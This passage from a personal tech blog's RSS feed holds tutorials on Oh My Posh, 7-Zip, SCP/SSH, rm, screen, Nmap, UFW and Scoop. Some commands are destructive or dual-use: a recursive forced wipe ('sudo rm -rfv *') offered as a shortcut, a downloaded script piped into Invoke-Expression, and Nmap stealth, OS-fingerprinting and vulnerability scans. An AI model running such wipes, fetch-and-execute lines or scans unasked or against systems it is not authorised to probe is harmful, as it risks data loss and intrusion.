    oh-my-posh init pwsh --config $env:POSH_THEMES_PATH\microverse-power.omp.json | Invoke-Expression
    ```

14. Opening Your PowerShell Profile with Notepad:
    ```powershell
    notepad $PROFILE
    ```

## Conclusion

In this guide, we&apos;ve explored the process of enhancing your Windows terminal experience using Oh My Posh. By incorporating stylish themes, powerful modules, and customizable configurations, you can transform your command-line environment into a more productive and visually appealing workspace. Here&apos;s a summary of what we&apos;ve covered:

1. **Installation and Setup**: We began by installing Oh My Posh using different methods, such as Winget, Scoop, and manual installation. We also emphasized the importance of using Nerd Fonts for optimal display.

2. **Theme Selection**: We introduced you to the wide variety of themes available for Oh My Posh and demonstrated how to preview and choose a theme that suits your style.

3. **Module Installation**: We explored the installation of essential modules—PSReadLine, posh-git, and Terminal-icons. These modules enhance your terminal experience by providing command history, Git information, and file and folder icons.

4. **Module Integration**: We explained how to integrate the installed modules into your PowerShell profile. This ensures that the modules are loaded automatically whenever you start PowerShell, enabling a consistent and enhanced terminal environment.

5. **PSReadLine Modes**: We covered different PSReadLine modes—History and ListView—that enhance command prediction and navigation within your terminal.

6. **Profile Customization**: We guided you through locating and modifying your PowerShell profile file. By adding specific commands to your profile, you can ensure that your chosen themes and modules are seamlessly integrated each time you launch PowerShell.

With the knowledge gained from this guide, you&apos;re now equipped to take control of your Windows terminal environment and create a customized workspace that reflects your preferences and boosts your productivity. Whether you&apos;re a developer, system administrator, or casual user, Oh My Posh empowers you to make the most of your command-line interactions.

Remember, the journey doesn&apos;t end here—experiment with themes, explore more modules, and tweak your settings until you achieve the perfect terminal setup tailored to your needs. Enjoy the powerful and visually pleasing experience that Oh My Posh brings to your Windows terminal!

## References

- https://ohmyposh.dev/docs/
- https://www.kwchang0831.dev/dev-env/pwsh/oh-my-posh</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>7-Zip on Linux: Installation and Usage Guide</title><link>https://ummit.dev//posts/linux/tools/7zip/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/7zip/</guid><description>Discover the Remarkable Efficiency of 7-Zip for File Compression and Extraction on the Linux Platform. and learn how to use!</description><pubDate>Wed, 16 Feb 2022 00:00:00 GMT</pubDate><content:encoded>## Introduction

7-Zip is a robust and versatile file compression tool that provides exceptional compression ratios while supporting a wide range of archive formats. In this guide, we&apos;ll delve into the world of 7-Zip on Linux, exploring its features, installation process, and practical usage scenarios.

## What is 7-Zip?

7-Zip is an open-source file archiver utility that excels at compressing files and creating archives. It stands out for its high compression ratio and support for various archive formats, making it an invaluable tool for reducing file sizes and organizing data.

### Installation

Getting started with 7-Zip on Linux is a breeze. Depending on your Linux distribution, you can use the package manager to install it.

#### For Ubuntu/Debian:

```shell
sudo apt update
sudo apt install p7zip-full p7zip-rar
```

#### For CentOS/RHEL:

```shell
sudo yum install epel-release
sudo yum install p7zip p7zip-plugins
```

#### For Arch based:

```shell
sudo pacman -S p7zip
```

#### For Gentoo:

```shell
sudo emerge -av app-arch/p7zip
```

### Basic Usage

Once installed, you can harness 7-Zip&apos;s capabilities using the command-line interface. Here are some essential commands to get you started:

1. **Creating an Archive:**

   To create a new archive, use the `7z` command followed by the archive name and the files you want to include:

   ```shell
   7z a archive.7z file1.txt file2.txt directory/
   ```

2. **Extracting Files:**

   Extracting files from an archive is just as simple. Use the `7z` command followed by the `x` flag and the archive name:

   ```shell
   7z x archive.7z
   ```

3. **Listing Contents:**

   To view the contents of an archive without extracting it, use the `l` flag:

   ```shell
   7z l archive.7z
   ```

4. **Adding to an Existing Archive:**

   You can add files to an existing archive by using the `u` flag:

   ```shell
   7z u archive.7z newfile.txt
   ```

## Conclusion

7-Zip is a powerful compression tool that can streamline file management and reduce storage space on your Linux system. By installing and mastering 7-Zip&apos;s command-line interface, you&apos;ll be equipped to efficiently compress, extract, and manage various archive formats, enhancing your productivity and organization skills. Whether you&apos;re handling personal files or managing server backups, 7-Zip proves to be an indispensable utility for Linux users seeking optimal compression solutions.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>SCP: A Comprehensive Guide</title><link>https://ummit.dev//posts/linux/tools/ssh/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/ssh/</guid><description>Discover the power of secure and efficient file transfers using SCP (Secure Copy) and learn how to seamlessly manage remote server access with SSH login methods. </description><pubDate>Thu, 27 Jan 2022 00:00:00 GMT</pubDate><content:encoded>## Introduction

In the realm of remote server management, the ability to securely transfer files and efficiently access remote systems is of paramount importance. This is where the `scp` (secure copy) command and SSH (Secure Shell) login methods shine. `scp` allows you to securely transfer files between local and remote systems, while SSH ensures robust authentication and data encryption. In this guide, we will delve into the world of `scp` for file transfers and explore advanced features, including verbose mode and custom port usage, to elevate your file transfer experience.

## Secure File Transfer with SCP

### Understanding SCP

`scp` (Secure Copy) is a command-line utility that facilitates secure file transfers between local and remote systems. Leveraging the security features of SSH, `scp` ensures your data remains encrypted and protected during transit.

### Utilizing Verbose Mode for Transparency

The `scp` command provides a `-v` (verbose) flag that displays detailed information about the file transfer process. This can be immensely helpful for troubleshooting and gaining insights into the transfer progress.

To enable verbose mode, simply append the `-v` flag to your `scp` command:

```shell
scp -v &lt;local_file&gt; user@remote_host:remote_path
```

### Customizing Port Usage

By default, `scp` uses port 22 for SSH connections. However, you can specify a custom port using the `-P` flag followed by the desired port number:

```shell
scp -P &lt;custom_port&gt; &lt;local_file&gt; user@remote_host:remote_path
```

## Streamlined Remote Server Access with SSH

### Enhanced Security with Verbose Logging

SSH also offers a verbose mode, which can be activated using the `-v` flag. This mode provides detailed information about the SSH connection process, aiding in debugging and security audits.

```shell
ssh -v user@remote_host
```

### Custom Ports for SSH Connections

Similar to `scp`, SSH allows you to specify custom ports for connections using the `-p` flag followed by the port number:

```shell
ssh -p &lt;custom_port&gt; user@remote_host
```

## Conclusion

By harnessing the power of `scp` for secure file transfers and leveraging advanced features such as verbose mode and custom port usage, you can significantly enhance your remote server management capabilities. These tools provide not only security and efficiency but also transparency and flexibility, ensuring that you have full control over your file transfers and remote access. Incorporate these techniques into your workflow to elevate your server administration prowess and streamline your interactions with remote systems.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>How to use Linux rm Command</title><link>https://ummit.dev//posts/linux/built-in-tools/rm/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/built-in-tools/rm/</guid><description>Learn how to use the rm command in Linux to remove files and directory.</description><pubDate>Sat, 08 Jan 2022 00:00:00 GMT</pubDate><content:encoded>## Introduction to the rm Command

The `rm` command, which stands for `remove`, is a powerful tool that allows you to delete files and directories from your system.

### Removing Files with rm

The basic syntax for removing files using the `rm` command is straightforward:

```shell
rm filename
```

By entering this command, you delete the specified file called `filename` from your system.

### Safeguarding with Interactive Mode

To add an extra layer of caution, you can use the `-i` option for interactive mode:

```shell
rm -i filename
```

This prompts you to confirm the deletion of each file, preventing accidental removals. You can answer with `y` (yes) or `n` (no) for each file.

### Removing Directories with rm

Deleting directories requires a slightly different approach. To remove an empty directory, use the following command:

```shell
rmdir directory_name
```

However, if you need to remove a directory and its contents recursively, you can use the `-r` option:

```shell
rm -r directory_name
```

Take care when using the `-r` option, as it will delete the directory and all its contents without confirmation.

### Using rm with Caution: the -f Flag

The `-f` flag, which stands for `force` is a potent option that removes files and directories without any prompts or warnings. While this can be useful for batch operations, exercise caution, as you can easily delete important data unintentionally.

```shell
rm -f filename
```

### Deleting Files Verbosely

For a more detailed view of what&apos;s happening, use the `-v` flag to enable verbose output:

```shell
rm -v filename
```

This option displays each file&apos;s name as it&apos;s being removed.

## Advanced Usage

### Using Wildcards to Remove Multiple Files

Wildcards offer a powerful way to remove multiple files at once. For instance, you can use `*` to delete all files (excluding hidden files) within a directory:

```shell
rm -f *
```
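
A safe way to see wildcard removal in action is to experiment inside a scratch directory first (the directory and file names below are just examples):

```shell
# create a scratch directory with a few throwaway files
mkdir -p /tmp/rm-demo
cd /tmp/rm-demo
touch a.txt b.txt c.log

# remove only the .txt files, verbosely
rm -v *.txt

# c.log survives because it did not match the pattern
ls
```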

### Convenient Shortcut

For users seeking a quick way to delete every file and subdirectory in the current directory with verbose output, consider the following command. Use it with extreme care: combined with `sudo`, it removes everything recursively, without confirmation.

```shell
sudo rm -rfv *
```

## Conclusion and Best Practices

While the `rm` command is a powerful tool for file and directory removal, its capabilities come with risks. To make the most of it while minimizing the potential for data loss:

1. Always double-check the files and directories you&apos;re about to delete.
2. Use the interactive mode (`-i`) or verbose mode (`-v`) for extra caution and clarity.
3. Reserve the `-f` (force) option for situations where you&apos;re certain of the files you&apos;re deleting.
4. When removing directories, be mindful of using the `-r` option, as it can lead to the loss of important data.

By mastering the `rm` command and its various options, you can confidently manage your files and directories in Linux while minimizing the risk of unintended consequences.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Screen Command for Server Management</title><link>https://ummit.dev//posts/linux/tools/screen/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/screen/</guid><description>Discover the power of the screen command in Linux for effective server management, remote sessions, and persistent terminal sessions. Learn how to install, use, and maximize your productivity with this versatile tool.</description><pubDate>Thu, 16 Dec 2021 00:00:00 GMT</pubDate><content:encoded>## Introduction

In the realm of Linux server management, the `screen` command stands as a versatile and powerful tool that can significantly enhance your productivity and streamline your workflow. Whether you&apos;re a system administrator, a developer, or actively involved in server maintenance, the `screen` command offers an array of features that can optimize multitasking, empower remote interactions, and provide a robust environment for long-running processes.

## The Utility of the `screen` Command

At its core, the `screen` command is a terminal multiplexer—a tool that enables you to create, manage, and navigate between multiple terminal sessions within a single window. This is particularly valuable when working with servers, as it allows you to maintain control over multiple tasks and sessions simultaneously, all while keeping your terminal organized and efficient.

## Installation

Before you can harness the power of the `screen` command for your server management tasks, you may need to install it, depending on your Linux distribution:

### For Ubuntu/Debian:

```shell
sudo apt update
sudo apt install screen
```

### For CentOS/RHEL:

```shell
sudo yum install screen
```

### For Arch-based distributions (e.g., Arch Linux, Manjaro):

```shell
sudo pacman -S screen
```

## Getting Started with `screen`

Once `screen` is installed, its usage can greatly enhance your server management capabilities. Here are some fundamental concepts and commands to help you get started:

### Efficient Multitasking:

Initiating a new `screen` session allows you to juggle multiple tasks seamlessly. Use:

```shell
screen
```

### Detach and Reattach:

One of the most powerful features of `screen` is its ability to detach from a session and reattach later. To detach, press `Ctrl-a` followed by `d`. To reattach:

```shell
screen -r
```

### Multiple Windows:

Within a `screen` session, create multiple windows to manage different tasks. To create a new window, press `Ctrl-a` followed by `c`. Navigate between windows with `Ctrl-a` followed by `n` or `Ctrl-a` followed by `p`.

### Terminal Splitting:

Split your terminal screen into panes for efficient multitasking. Use `Ctrl-a` followed by `|` (vertical split) or `Ctrl-a` followed by `S` (horizontal split). Navigate between panes with `Ctrl-a` followed by `Tab`.

### Renaming Sessions:

Easily identify and manage your `screen` sessions by giving them meaningful names. For example, to create a new session named &quot;myserver,&quot; use:

```shell
screen -dmS myserver
```

## Advanced Features for Server Management

The `screen` command offers a variety of advanced features that are invaluable for server management:

### Collaborative Sessions:

Collaborate with others by sharing your `screen` session:

```shell
screen -x
```

### Session Logging:

Record your terminal session for future reference (by default, output is written to a file named `screenlog.0` in the current directory):

```shell
screen -L
```

## Elevating Your Server Management with `screen`

The `screen` command is an indispensable tool that can significantly enhance your server management capabilities. Whether you&apos;re overseeing remote servers, handling long-running processes, or conducting maintenance tasks, `screen` empowers you to maintain efficient and organized terminal sessions. Incorporating the `screen` command into your toolkit ensures that you have a powerful solution at your disposal for effective server management, allowing you to optimize your workflow and accomplish tasks with ease.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>A Simple Guide to Using Nmap for Network Scanning</title><link>https://ummit.dev//posts/infosec/nmap/</link><guid isPermaLink="true">https://ummit.dev//posts/infosec/nmap/</guid><description>In this comprehensive guide, we will explore how to harness the capabilities of Nmap to check your Network Security.</description><pubDate>Tue, 14 Dec 2021 00:00:00 GMT</pubDate><content:encoded>## Introduction

Nmap is a powerful tool for scanning networks. It helps you find open ports, services, and potential security issues in your home network or server. This guide will show you how to use Nmap to check your network security.

## Installing Nmap

To use Nmap, you need to install it. It works on Windows, macOS, and Linux. If you&apos;re using Kali Linux, Nmap is already installed. For other Linux systems, you can install it with:

```bash
sudo apt update -y
sudo apt install nmap -y
```

### Scan a single IP

To scan a device on your network, use the following command:

```bash
nmap 192.168.1.1
```

&gt;*This command scans the specified IP address (192.168.1.1) to identify open ports and services running on that device.*

### Scan Multiple IPs

You can scan multiple devices on your network by specifying a range of IP addresses. For example:

```bash
nmap 192.168.1.1-20
```

&gt;*This command scans a range of IP addresses from 192.168.1.1 to 192.168.1.20, allowing you to check multiple devices in one go.*
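As a side note, the `1-20` range is Nmap's own notation; if you ever need the explicit address list (for scripting, or for tools that lack range syntax), bash brace expansion produces the same set:

```shell
# Expands to 192.168.1.1 192.168.1.2 ... 192.168.1.20
targets="$(echo 192.168.1.{1..20})"
echo "$targets"

# nmap accepts the expanded list too: nmap $targets
```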

### Service Version Detection

To detect the versions of services running on open ports, use:

```bash
nmap -sV &lt;target&gt;
```

&gt;*This command uses the `-sV` option to detect the versions of services running on the open ports of the specified target.*

### Scan a Larger Network

You might want to scan a larger network to identify all devices and services. As a quick reference for the range of IP addresses covered by a given prefix, see the CIDR notation table :)

| **CIDR Notation** | **IP Address Range**          |
|-------------------|-------------------------------|
| **/24**           | 192.168.0.0 - 192.168.0.255   |
| **/16**           | 192.168.0.0 - 192.168.255.255 |
| **/8**            | 192.0.0.0 - 192.255.255.255   |
| **/0**            | 0.0.0.0 - 255.255.255.255     |

And you can use the following command to scan a larger network:

```bash
nmap 192.168.0.0/24
```

&gt;*This command scans all IP addresses in the specified subnet (192.168.0.0/24), which includes 256 addresses from 192.168.0.0 to 192.168.0.255.*
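The address counts in the table follow directly from the prefix length: a /N prefix leaves 32 - N host bits, so it covers 2^(32 - N) addresses. A tiny bash helper illustrates the arithmetic:

```shell
# Addresses covered by a /N prefix: 2^(32 - N)
cidr_size() { echo $((2 ** (32 - $1))); }

cidr_size 24   # 256
cidr_size 16   # 65536
cidr_size 8    # 16777216
```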

### Service Detection Without Ping

To detect services running on open ports, use:

```bash
nmap -Pn -sV &lt;target&gt;
```

&gt;*This command performs a scan on the target without pinging it first (using `-Pn`), while also detecting service versions.*

### Scan Without Ping

```bash
nmap -Pn &lt;target&gt;
```

&gt;*This command scans the target directly without checking if it is online, which can be useful for devices that do not respond to ping requests.*

### Ping Scan (Check Online Hosts)

```bash
nmap -sP &lt;target&gt;
```

&gt;*This command performs a ping scan to identify which hosts are online in the specified range or target. In newer Nmap releases, `-sP` has been renamed to `-sn`; the old flag still works as an alias.*

### List Scan (Show Hosts Without Scanning)

```bash
nmap -sL &lt;target&gt;
```

&gt;*This command lists all the targets without actually scanning them, which can be useful for generating a list of hosts for further analysis.*

### OS Detection

Nmap also provides OS detection capabilities. To detect the operating system of a target, use the `-O` option. OS detection sends low-level network packets and certain ICMP requests, so it requires root or administrator permissions. This technique is also known as TCP/IP fingerprinting.

```bash
nmap -O &lt;target&gt;
```

&gt;*This command attempts to identify the operating system of the target by analyzing the responses to various network packets.*

### TCP SYN Scan with OS Detection

To perform a TCP SYN scan (stealth scan) and attempt to guess the target&apos;s operating system, use the `-sS -O` flags:

```bash
sudo nmap -sS -O &lt;target&gt;
```

&gt;*This command runs a TCP SYN scan (which is less detectable) and attempts to identify the operating system of the target.*

### TCP Connect Scan

To perform a TCP connect scan, use the `-sT` flag:

```bash
nmap -sT &lt;target&gt;
```

&gt;*This command performs a full TCP connect scan on the target, which establishes a full connection to each port to check if it is open.*

### Scanning for Specific Ports

To scan for specific ports, use the `-p` flag followed by the port numbers. For example, to scan ports 80, 443, and 8080, use:

```bash
nmap -p 80,443,8080 &lt;target&gt;
```

&gt;*This command scans the specified ports (80, 443, and 8080) on the target to check for open services.*

### Scanning a Range of Ports

To scan a range of ports, use the `-p` flag followed by the range of ports. For example, to scan ports 1 to 100, use:

```bash
nmap -p 1-100 &lt;target&gt;
```

&gt;*This command scans the range of ports from 1 to 100 on the target to check for open services.*

### Scanning All Ports

To scan all ports (1-65535), use the `-p-` flag:

```bash
nmap -p- &lt;target&gt;
```

&gt;*This command scans all ports on the target to check for open services.*

### Combo Options

You can combine multiple options to perform a more comprehensive scan. For example, to perform a SYN scan with version detection and OS detection across all ports, use:

```bash
sudo nmap -sS -sV -O -p- &lt;target&gt;
```
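For longer scans like this, it is worth saving the results to disk. Nmap&apos;s output flags handle that (the `scan` filenames below are just examples):

```shell
nmap -sV -oN scan.txt &lt;target&gt;   # human-readable text output
nmap -sV -oX scan.xml &lt;target&gt;   # XML output, useful for other tools
nmap -sV -oA scan &lt;target&gt;       # all formats: scan.nmap, scan.xml, scan.gnmap
```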

## Vulnerability Scanning with Nmap

Nmap can also check for known vulnerabilities using scripts like `nmap-vulners`. The source code can be found at [vulnersCom/nmap-vulners](https://github.com/vulnersCom/nmap-vulners).

### Ensure `nmap-vulners` is Installed

To check if `nmap-vulners` is installed, run the following command. If you see a result like `vulners.nse`, the script is installed and available for use with your Nmap installation:

```bash
ls /usr/share/nmap/scripts | grep vulners
```

If you don&apos;t see any results, it&apos;s likely that the script isn&apos;t installed. You can download the script from the repository and place the `*.nse` files in `/usr/share/nmap/scripts/`.

### Scanning with `nmap-vulners`

Run the following command to check for vulnerabilities:

```bash
nmap --script vulners &lt;target&gt;
```

&gt;*This command runs Nmap and applies the `nmap-vulners` script to your scan, checking for known vulnerabilities.*

### Specify a CVSS Score

You can specify the minimum CVSS score for vulnerabilities to be reported. For example, to only show vulnerabilities with a CVSS score of 7 or higher, use:

```bash
nmap --script vulners --script-args mincvss=7 &lt;target&gt;
```

&gt;*This command runs Nmap with the `nmap-vulners` script and only reports vulnerabilities with a CVSS score of 7 or higher.*

## Conclusion

Nmap is a versatile tool that can help you identify potential security issues in your network. By scanning your network with Nmap, you can find open ports, services, and vulnerabilities that may be exploited by attackers :)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>UFW Guide</title><link>https://ummit.dev//posts/linux/tools/ufw/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/ufw/</guid><description>Discover Uncomplicated Firewall (UFW), a user-friendly tool for managing firewall rules in Linux. Learn how to secure your system, control incoming and outgoing traffic, and navigate UFW&apos;s features.</description><pubDate>Tue, 14 Dec 2021 00:00:00 GMT</pubDate><content:encoded>## Introduction to Uncomplicated Firewall (UFW)

In today&apos;s digital landscape, network security is of paramount importance. Safeguarding your Linux system from unauthorized access and potential threats is a critical step in maintaining its integrity. This is where Uncomplicated Firewall (UFW) comes into play – a user-friendly interface designed to manage iptables, the default firewall management tool for Linux. UFW simplifies the process of configuring and managing firewall rules, making it accessible to users of all skill levels. In this comprehensive guide, we will delve into the intricacies of UFW, empowering you to bolster your system&apos;s security.

## What is UFW?

Uncomplicated Firewall (UFW) serves as an essential front-end for iptables, offering a straightforward and intuitive means to handle firewall rules. It caters to both newcomers and seasoned professionals, abstracting the complexities of iptables while retaining its powerful functionalities. With UFW, you can define rules to regulate inbound and outbound network traffic, significantly enhancing the security of your system.

## Installation and Initial Steps

While UFW is often pre-installed on many Linux distributions, you can install it using your package manager if necessary. For instance:

### Ubuntu/Debian based:

To install UFW on Ubuntu/Debian based systems, use the following command:
```shell
sudo apt-get install ufw
```

### Arch-Based:

To install UFW on Arch-Based systems, use the following command:
```shell
sudo pacman -S ufw
```

### Fedora:

To install UFW on Fedora, use the following command:
```shell
sudo dnf install ufw
```

These commands will ensure that UFW is installed and ready for configuration on your system.

### Getting Started

Once installed, you can quickly enable UFW and begin using it. Here are the fundamental commands to kick-start your journey:

To enable UFW:
```shell
sudo ufw enable
```

To disable UFW:
```shell
sudo ufw disable
```

To check UFW status:
```shell
sudo ufw status
```

## Essential Firewall Management

### Allowing and Denying Connections

UFW adheres to a default deny-all policy, meaning it blocks all incoming connections until explicitly allowed. You can use the following commands to permit specific connections:

To allow incoming HTTP traffic:
```shell
sudo ufw allow 80/tcp
```

To allow incoming SSH traffic:
```shell
sudo ufw allow ssh
```

### Deleting, Resetting, Denying, and Allowing Rules

To effectively manage firewall rules, UFW provides key commands:

To delete a rule by its number:
```shell
sudo ufw delete &lt;rule_number&gt;
```
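To find the rule number in the first place, list the current rules with their indices:

```shell
sudo ufw status numbered
```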

To reset UFW to its default settings:
```shell
sudo ufw reset
```

To deny incoming connections to a specific port:
```shell
sudo ufw deny &lt;port&gt;
```

To allow incoming connections to a specific port:
```shell
sudo ufw allow &lt;port&gt;
```

To delete a specific &quot;allow&quot; rule:

```shell
sudo ufw delete allow http
```
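UFW rules can also be scoped to a source address. For example, assuming your LAN is 192.168.1.0/24 (adjust to your own network), you could restrict SSH access to that subnet only:

```shell
sudo ufw allow from 192.168.1.0/24 to any port 22 proto tcp
```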

## Advanced Configuration and Customization

### Application Profiles

UFW includes application profiles to simplify rule configuration for common services. To enable a profile, use:

```shell
sudo ufw allow &lt;application_name&gt;
```

### Connection Rate Limiting

UFW empowers you to limit the number of connections to a particular port:

```shell
sudo ufw limit &lt;port&gt;/&lt;protocol&gt;
```

## Optimal Security Practices

Uncomplicated Firewall (UFW) revolutionizes the management of firewall rules, making network security accessible to a wider audience. However, ensuring effective protection requires adopting best practices:

1. Activate UFW to initiate security measures.
2. Define rules based on your system&apos;s requirements and services.
3. Regularly review and update your firewall rules.
4. Thoroughly test rules to confirm their intended functionality.

By mastering both UFW&apos;s foundational and advanced features, you can fortify your Linux system against potential threats and unauthorized access. UFW&apos;s user-friendly approach empowers individuals at all skill levels to take command of their system&apos;s network security and ensure its safety.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Scoop: Windows Terminal Package Manager</title><link>https://ummit.dev//posts/windows/terminal/scoop/</link><guid isPermaLink="true">https://ummit.dev//posts/windows/terminal/scoop/</guid><description>Enhance Your Terminal Efficiency with Scoop – Discover How to Install and Utilize this Windows Package Manager!</description><pubDate>Fri, 10 Dec 2021 00:00:00 GMT</pubDate><content:encoded>## Why Scoop?

Are you tired of the hassle of managing software installations on your Windows system? If you&apos;re looking for an efficient and command-line-based package manager, you&apos;re in for a treat! Enter Scoop, a versatile package manager that can simplify your software management tasks. In this guide, we&apos;ll walk you through installing Scoop and using this package manager.

Before we dive into the details, if you&apos;re curious and eager to get started right away, you can find the official Scoop website [here](https://scoop.sh/).

## What is Scoop?

Scoop is a nifty package manager designed exclusively for Windows systems. It allows you to install, update, and uninstall software packages from the command line, all without the need for clicking through wizards or prompts. With Scoop, software management becomes a breeze, and you can focus on what matters most: getting things done.

### Getting Started: Installing Scoop

To get started with Scoop, follow these simple steps:

1. **Open a PowerShell terminal:** Launch your PowerShell terminal.

2. **Set Execution Policy (Optional):** If this is your first time running a remote script, you might need to set the execution policy to allow it. Use the following command:

   ```powershell
   Set-ExecutionPolicy RemoteSigned -Scope CurrentUser
   ```

3. **Install Scoop:** Now, it&apos;s time to install Scoop. Run the following command:

   ```powershell
   irm get.scoop.sh | iex
   ```

   This command retrieves the installation script from the internet and runs it using the `iex` (Invoke-Expression) command.

And that&apos;s it! You now have Scoop installed and ready to use!

### Basic Usage: Package Management

With Scoop installed, you can start exploring its capabilities:

- **Installing Packages:** Use the `scoop install` command followed by the name of the package to install software effortlessly. For example:

  ```powershell
  scoop install git
  ```

- **Updating Packages:** Keep Scoop itself and its bucket manifests up to date with the `scoop update` command:

  ```powershell
  scoop update
  ```

- **Updating All Packages:** The `scoop update --all` command is a convenient way to update all packages installed via Scoop:

    &gt;Notes: there might be instances where this command doesn&apos;t work as expected. In such cases, you may need to manually update specific packages using their individual update commands. This ensures that you&apos;re getting the most accurate and up-to-date updates for each package.

  ```powershell
  scoop update --all
  ```

  Keep in mind that, occasionally, the nature of certain packages or dependencies might require a manual update approach to ensure everything works smoothly.

- **Listing Installed Packages:** To see a list of all installed packages, you can use the `scoop list` command:

  ```powershell
  scoop list
  ```

  If you&apos;re unsure about the exact name of a package, you can use this command to quickly identify installed packages.

- **Updating Specific Packages:** If you want to ensure the update of a specific package, you can use the `scoop update` command followed by the package name. For instance, to update Git:

  ```powershell
  scoop update git
  ```

  If you&apos;re not sure about the package name, you can refer to the list of installed packages using `scoop list`.

Remember, staying up to date with package updates helps ensure your system is secure and that you&apos;re benefiting from the latest features and improvements.
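A few more everyday Scoop commands worth knowing:

```shell
scoop search &lt;keyword&gt;     # find packages matching a keyword
scoop info &lt;package&gt;       # show details about a package
scoop uninstall &lt;package&gt;  # remove an installed package
```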

## Installing and Managing Packages with Scoop: Global vs. User Installations

If you&apos;re familiar with Linux, you&apos;ve probably encountered the convenience of `sudo` for executing commands with superuser permissions. In the Windows world, there&apos;s a similar concept where you can install packages either globally (accessible by all users on the system) or locally (for your user account) using Scoop, a powerful package manager. This distinction is determined using the `-g` flag in the `scoop install` command.

### Local Installation: Tailored for Your User Account

A local installation is a great choice if you prefer to manage packages separately for each user on your system. By omitting the `-g` flag during installation, you&apos;re essentially telling Scoop to install the package locally, making it specific to your user account. The advantage of this approach is that you can keep your set of tools and utilities separate from those of other users. The best part? You won&apos;t need superuser permissions for installation.

Here&apos;s the command for a local installation:

```shell
scoop install &lt;package&gt;
```

Replace `&lt;package&gt;` with the name of the package you want to install.

### Global Installation: Available System-Wide

On the other hand, if you want a package to be accessible to all users on the system, a global installation is the way to go. This involves using the `-g` flag during installation. By doing so, you&apos;re instructing Scoop to install the package globally, making it available from any user account. **However, it&apos;s important to note that installing a package globally using the `-g` flag requires superuser permissions.** This is because global installation involves making system-wide changes that affect all users.

&gt;**Tip**: If you only need a package to be available for your user account, you can install it locally without using the `-g` flag. This ensures that you won&apos;t require superuser permissions for installation, and the package will remain exclusive to your user.

Here&apos;s the command for a global installation:

1. **Open the Terminal as Superuser**: Begin by opening the terminal with superuser privileges. This step is crucial as you&apos;ll need superuser access to install packages globally.

2. **Install package with Globally -g**: Replace `&lt;package&gt;` with the name of the package you intend to install.

```shell
scoop install -g &lt;package&gt;
```

By understanding the difference between local and global installations and the role of the `-g` flag, you can tailor your package management approach to suit your needs. With this knowledge, you can make the most of Scoop and efficiently organize your Windows terminal sessions.

## Simplify Superuser Tasks with Scoop and gsudo

Have you ever found yourself frustrated by the need to repeatedly right-click to open the Windows Terminal with superuser permissions? If so, there&apos;s a solution that can save you time and hassle: the `gsudo` package. This tool, which is available through Scoop, allows you to perform tasks that require administrative access without the need for right-clicking. Here&apos;s how to get started with `gsudo` using the global installation approach.

### Install gsudo Globally

To make the most of `gsudo`, I recommend a global installation. This way, the tool will be available system-wide, ensuring that you can use it from any user account. Let&apos;s go through the steps:

1. **Open the Terminal as Superuser**: Begin by opening the terminal with superuser privileges. This step is crucial as you&apos;ll need superuser access to install packages globally.

2. **Install gsudo**: Use the following command to install `gsudo` globally:

   ```shell
   scoop install -g gsudo
   ```

   By using the `-g` flag, you&apos;re installing `gsudo` in a way that&apos;s accessible to all users on the system.

3. **Restart Your Terminal**: After the installation is complete, restart your terminal to ensure that the changes take effect.

4. **Enjoy Effortless Superuser Access**: That&apos;s it! With `gsudo` installed, you can now use the `sudo` command in your terminal. When you do, a popup window will appear, requesting superuser permissions. This means you can perform administrative tasks without the need to right-click and open a new terminal window each time.

By opting for the global installation of `gsudo`, you&apos;re streamlining your workflow and eliminating the need for repetitive actions. Whether you&apos;re managing files, configuring settings, or performing other administrative tasks, `gsudo` simplifies the process and enhances your overall terminal experience.

#### Putting gsudo to the Test

Now that you have `gsudo` installed, it&apos;s time to put it to the test! If you&apos;re not familiar with Linux commands, don&apos;t worry—I&apos;ll guide you through the process. With `gsudo`, you can perform tasks that require superuser permissions without having to right-click and open the application as an administrator.

Here&apos;s a practical example of how to use `gsudo` to open Notepad with superuser privileges:

1. **Open the Terminal**: Launch the terminal to get started.

2. **Use `gsudo`**: With `gsudo`, you can use either the `sudo` or `gsudo` command. They both work the same way. To open Notepad with superuser permissions, simply type:

   ```shell
   sudo notepad
   ```

   This command tells the terminal to run Notepad with superuser privileges, allowing you to edit system files and perform administrative tasks.

3. **Enter Your Password**: After executing the command, a popup window will appear, asking for your permission to run Notepad with superuser privileges. Enter your password to proceed.

4. **Start Editing**: Voila! Notepad is now open with the necessary permissions. You can use it to edit files that require administrative access.

By using `gsudo`, you&apos;ve eliminated the need for repetitive right-click actions to open applications with superuser privileges. This streamlined approach enhances your workflow and makes it easier to perform administrative tasks from the command line.

## Conclusion

Scoop is a fantastic tool that simplifies software management on Windows systems. By following the steps outlined in this guide, you&apos;ve successfully installed Scoop and unlocked a world of efficient package management. From installing software to keeping it updated, Scoop has your back, saving you time and effort.

So why not embrace the power of Scoop and take control of your software ecosystem? With Scoop&apos;s command-line convenience, you&apos;ll be amazed at how smoothly software management can be. Get ready to streamline your system and focus on what truly matters!</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>The Ultimate Guide to Setting Up a Complete Counter-Strike 1.6 Server, From Zero to Zombie Plague Server, Play with yapb bot and Public the server on the Internet!</title><link>https://ummit.dev//posts/games/counter-strike/16/16-24hr-wan-server-full-tutorials/</link><guid isPermaLink="true">https://ummit.dev//posts/games/counter-strike/16/16-24hr-wan-server-full-tutorials/</guid><description>Learn how to set up a Counter Strike 1.6 server on an Ubuntu Virtual Private Server (VPS) with this comprehensive guide, Also learn how to install yapb bot.</description><pubDate>Fri, 10 Dec 2021 00:00:00 GMT</pubDate><content:encoded>## Why Choose a VPS for Hosting?

